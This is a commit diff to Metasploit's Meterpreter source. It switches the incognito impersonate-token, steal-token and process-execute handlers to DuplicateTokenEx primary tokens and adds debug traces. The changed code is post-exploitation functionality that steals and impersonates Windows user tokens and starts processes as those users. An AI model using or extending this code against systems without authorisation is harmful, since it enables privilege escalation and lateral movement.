This *should* fix all cases where execute -t would fail to use an impersonated token

git-svn-id: file:///home/svn/framework3/trunk@9754 4d416f70-5f16-0410-b530-b9f4589650da

c/meterpreter/source/common/common.h

@@ -33,7 +33,7 @@
 #include "zlib/zlib.h"
 
 
-// #define DEBUGTRACE
+//#define DEBUGTRACE
 
 #ifdef DEBUGTRACE
 #define dprintf(...) real_dprintf(__VA_ARGS__)

c/meterpreter/source/extensions/incognito/incognito.c

@@ -149,8 +149,8 @@ DWORD request_incognito_impersonate_token(Remote *remote, Packet *packet)
 					strncat(return_value, "[+] Successfully impersonated user ", sizeof(return_value)-strlen(return_value)-1);
 					strncat(return_value, token_list[i].username, sizeof(return_value)-strlen(return_value)-1);
 					strncat(return_value, "\n", sizeof(return_value)-strlen(return_value)-1);
-					
-					if (!DuplicateToken(token_list[i].token, SecurityImpersonation, &xtoken)) {
+				
+					if (!DuplicateTokenEx(token_list[i].token, MAXIMUM_ALLOWED, NULL, SecurityImpersonation, TokenPrimary, &xtoken)) {
 						dprintf("[INCOGNITO] Failed to duplicate token for %s (%u)", token_list[i].username, GetLastError());
 					} else {
 						core_update_thread_token(remote, xtoken);

c/meterpreter/source/extensions/stdapi/server/sys/config/config.c

@@ -230,10 +230,11 @@ DWORD request_sys_config_steal_token(Remote *remote, Packet *packet)
 			dprintf("[STEAL-TOKEN] Failed to impersonate token for %d (%u)", pid, res);
 			break;	
 		}
-	
-		if(! DuplicateToken(token, SecurityImpersonation, &xtoken)) {
+
+
+		if(! DuplicateTokenEx(token, MAXIMUM_ALLOWED, NULL, SecurityIdentification, TokenPrimary, &xtoken)) {
 			res = GetLastError();
-			dprintf("[STEAL-TOKEN] Failed to duplicate token for %d (%u)", pid, res);
+			dprintf("[STEAL-TOKEN] Failed to duplicate a primary token for %d (%u)", pid, res);
 			break;	
 		}
 

c/meterpreter/source/extensions/stdapi/server/sys/process/process.c

@@ -256,16 +256,21 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet)
 		{
 			// If there is an impersonated token stored, use that one first, otherwise
 			// try to grab the current thread token, then the process token
-			if (remote->hThreadToken)
+			if (remote->hThreadToken){
 				token = remote->hThreadToken;
+				dprintf("[execute] using thread impersonation token");
+			}
 			else if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, TRUE, &token))
 				OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &token);
 
+			dprintf("[execute] token is 0x%.8x", token);
+
 			// Duplicate to make primary token (try delegation first)
 			if (!DuplicateTokenEx(token, TOKEN_ALL_ACCESS, NULL, SecurityDelegation, TokenPrimary, &pToken))
 			if (!DuplicateTokenEx(token, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &pToken))
 			{
 				result = GetLastError();
+				dprintf("[execute] failed to duplicate token 0x%.8x", result);
 				break;
 			}
 
@@ -275,6 +280,7 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet)
 				lpfnDestroyEnvironmentBlock = (LPFNDESTROYENVIRONMENTBLOCK) GetProcAddress( hUserEnvLib, "DestroyEnvironmentBlock" );
 				if (lpfnCreateEnvironmentBlock && lpfnCreateEnvironmentBlock( &pEnvironment, pToken, FALSE)) {
 					createFlags |= CREATE_UNICODE_ENVIRONMENT;
+					dprintf("[execute] created a duplicated environment block");
 				} else {
 					pEnvironment = NULL;
 				}
@@ -284,6 +290,7 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet)
 			if (!CreateProcessAsUser(pToken, NULL, commandLine, NULL, NULL, inherit, createFlags, pEnvironment, NULL, &si, &pi))
 			{
 				result = GetLastError();
+				dprintf("[execute] failed to create the new process 0x%.8x", result);
 				break;
 			}